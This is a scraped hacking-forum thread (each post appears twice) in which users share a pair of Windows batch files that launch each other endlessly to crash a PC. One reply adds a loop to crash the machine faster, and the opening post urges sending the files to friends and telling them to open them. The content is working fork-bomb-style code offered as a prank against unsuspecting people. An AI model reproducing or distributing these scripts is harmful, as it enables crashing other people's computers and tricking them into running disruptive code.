Sinisterly
[PRANK OR SERIOUS] Batch command - Printable Version

+- Sinisterly (https://sinister.ly)
+-- Forum: Coding (https://sinister.ly/Forum-Coding)
+--- Forum: Coding (https://sinister.ly/Forum-Coding--71)
+--- Thread: [PRANK OR SERIOUS] Batch command (/Thread-PRANK-OR-SERIOUS-Batch-command)

Pages: 1 2 3 4


[PRANK OR SERIOUS] Batch command - Shadow Hunter - 03-11-2011

This is one of the simplest batch scripts ever

i discovered it on my friend pc...guess wht happened after tht(u will figure out at the end of this topic)

open a new notepad and type

Code:
start crash2.bat


save it as crash1.bat

open another new notepad and type

Code:
start crash1.bat


save it as crash2.bat

Evil double clik either and they would open up simultaneously and continuously...and then it would crash Biggrin...after creating this send this file to one of ur friends and tell them to open either....guess u know the answer now Tongue


[PRANK OR SERIOUS] Batch command - Shadow Hunter - 03-11-2011

This is one of the simplest batch scripts ever

i discovered it on my friend pc...guess wht happened after tht(u will figure out at the end of this topic)

open a new notepad and type

Code:
start crash2.bat


save it as crash1.bat

open another new notepad and type

Code:
start crash1.bat


save it as crash2.bat

Evil double clik either and they would open up simultaneously and continuously...and then it would crash Biggrin...after creating this send this file to one of ur friends and tell them to open either....guess u know the answer now Tongue


RE: [PRANK OR SERIOUS] Batch command - 1234hotmaster - 03-11-2011

hehe nice one the first will open the second and the second will open the first Biggrin


RE: [PRANK OR SERIOUS] Batch command - 1234hotmaster - 03-11-2011

hehe nice one the first will open the second and the second will open the first Biggrin


RE: [PRANK OR SERIOUS] Batch command - Shadow Hunter - 03-11-2011

yeah and finally it would crash the pc Evil


RE: [PRANK OR SERIOUS] Batch command - Shadow Hunter - 03-11-2011

yeah and finally it would crash the pc Evil


RE: [PRANK OR SERIOUS] Batch command - 1llusion - 03-11-2011

cool Smile

to improve it a bit you can add a loop:

Code:
:loop start crash2.bat goto loop

Code:
:loop start crash1.bat goto loop

then you will crash pc a lot faster Smile


RE: [PRANK OR SERIOUS] Batch command - 1llusion - 03-11-2011

cool Smile

to improve it a bit you can add a loop:

Code:
:loop start crash2.bat goto loop

Code:
:loop start crash1.bat goto loop

then you will crash pc a lot faster Smile


RE: [PRANK OR SERIOUS] Batch command - 1234hotmaster - 03-11-2011

lol 1lussion is right that will make it alot faster then the normal opening eachother Tongue


RE: [PRANK OR SERIOUS] Batch command - 1234hotmaster - 03-11-2011

lol 1lussion is right that will make it alot faster then the normal opening eachother Tongue